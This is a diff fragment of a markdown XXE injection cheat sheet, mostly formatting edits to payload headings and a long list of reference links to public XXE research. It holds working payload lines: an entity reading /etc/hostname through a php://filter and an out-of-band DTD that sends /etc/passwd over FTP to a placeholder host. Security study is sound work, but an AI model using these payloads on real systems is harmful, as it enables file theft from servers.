| UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l |
| UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. |
@ -544,7 +540,7 @@ Ref.
**OOB via SVG rasterization**
*xxe.svg*
_xxe.svg_
```xml
<?xml version="1.0" standalone="yes"?>
@ -568,7 +564,7 @@ Ref.
</svg>
```
*xxe.xml*
_xxe.xml_
```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
@ -589,7 +585,7 @@ Ref.
Format of an Open XML file (inject the payload in any .xml file):
- /_rels/.rels
- /\_rels/.rels
- [Content_Types].xml
- Default Main Document Part
- /word/document.xml
@ -666,7 +662,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
```xml
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
```
Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv):
@ -690,7 +686,6 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
%external;
```
## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
@ -729,29 +724,29 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
## References
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka
* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
* [How we got read access on Googles production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify
* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht
* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals
* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017
* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG
* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10)
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/resources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
* [Data exfiltration using XXE on a hardened server - Ritik Singh - Jan 29, 2022](https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac)
* [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - optistream](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
- [XML External Entity (XXE) Processing - OWASP](<https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing>)
- [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
- [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka
- [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
- [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
- [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
- [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
- [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)
- [How we got read access on Googles production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify
- [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht
- [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals
- [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017
- [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG
- [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html)
- [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov
- [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
- [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
- [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10)
- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
- [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
- [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
- [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
- [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
- [Data exfiltration using XXE on a hardened server - Ritik Singh - Jan 29, 2022](https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac)
- [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - optistream](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)